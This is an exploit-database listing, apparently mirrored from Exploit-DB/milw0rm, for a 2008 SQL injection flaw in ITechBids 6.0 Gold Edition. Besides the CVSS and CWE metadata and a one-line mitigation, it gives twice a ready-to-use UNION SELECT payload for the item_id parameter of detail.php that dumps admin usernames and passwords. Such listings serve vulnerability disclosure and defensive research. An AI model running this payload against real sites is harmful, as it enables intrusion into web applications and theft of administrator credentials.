header-logo
Suggest Exploit
vendor:
Itechbids
by:
SoSo H H
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Itechbids
Affected Version From: 6
Affected Version To: 6
Patch Exists: YES
Related CWE: N/A
CPE: a:itechscripts:itechbids:6.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

ITechBids v.6.0 Gold Edition Sql Injection Exploit

The vulnerability exists in the detail.php page, where an attacker can inject malicious SQL code in the item_id parameter. An example of the exploit is (SQL)=-1%20union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from%20admin/*#

Mitigation:

Input validation and sanitization should be implemented to prevent SQL injection attacks.
Source

Exploit-DB raw data:

############################################################################
# ITechBids v.6.0 Gold Edition Sql Injection Exploit                       #
#                                                                          #
# AUTHOR:SoSo H H (Iraqi-Cracker)                                          #
#                                                                          #
# Script Site: http://itechscripts.com/                                    #
#                                                                          #
# Price:$125.00                                                            #
#                                                                          #
#                                                                          #
############################################################################
# Exploit in:                                                              #
# detail.php?item_id==(SQL)                                                #
#                                                                          #
# Example:                                                                 #
#                                                                          #
# (SQL)=-1%20union+select+1,2,3,concat(user_name,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from%20admin/*#
############################################################################
# Greetz:                                                                  #
# L!0N,El Mariachi,My Sweet,Shadow Administrator,TrYaG Team,Iraqi-KoRn     #
# Mini.Spider,and All 7shasha Boards Members!                              #
############################################################################

# milw0rm.com [2008-02-10]